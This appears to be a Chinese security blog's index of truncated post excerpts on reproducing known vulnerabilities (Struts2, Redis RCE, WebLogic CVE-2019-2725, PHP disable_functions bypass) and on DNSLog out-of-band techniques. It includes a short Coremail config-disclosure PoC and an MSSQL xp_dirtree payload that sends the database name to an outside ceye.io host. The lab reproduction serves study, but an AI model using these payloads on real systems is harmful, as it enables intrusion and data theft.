本来想着来弄几个st2 的老漏洞来测试一下 找了一圈。还是选择了docker 进入dockerhub 找了一下。发现有一个全版本的老的st2 This image contains demo applications for...
绕过php 函数被禁用的限制执行命令
我只是一个github 的搬运工 https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD 下载。之后。搭建一个测试环境
Redis-RCE
远程代码执行redis4和redis5 来自https://github.com/jas502n/Redis-RCE python代码 [root@btmail script]# git clone https://github.com/jas502n/Redis-RCE.git ...
搭建oracle 注入环境
碰到了一个很复杂的SQL 注入的oracle 注入坑。 那么就弄一个本地测试环境吧 环境:Centos 7.4 64 那么首先弄一个oracle 环境 想了一下还是用Docker 了 dock...
CVE-2019-2725 绕过 复现
CVE-2019-2725 绕过 复现 系统版本 Centos7.5 JDK 版本:jdk1.6.0_45 :直接去官网下载 weblogic 版本:10.3.6 : 直接去官网下载 ...
coremail poc
import requests,sys def mailsmsPoC(url): url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/" r = requests.get(url) if (r.status_code != '404') and ("/home/coremail...
CVE-2019-2725 复现
Docker 搭建环境 docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest http://localhost:49163/console User: weblogi...
通过宝塔面板搭建dns_log 平台
开源的DNS_log 平台 https://github.com/BugScanTeam/DNSLog 下载源代码 [root@btmail ~]# cd /dnslog/ [root@btmail dnslog]# git clone https://github.com/BugScanTeam/DNS...
mssql 无回显 注入
DECLARE @host varchar(128); SELECT @host=(select db_name())+ '.hfkzaq.ceye.io'; select @host; EXEC('master..xp_dirtree "\\'+@host+'\foobar$"'); ...
DNS log 学习
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问 www.o2oxy.cn 时. 最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一...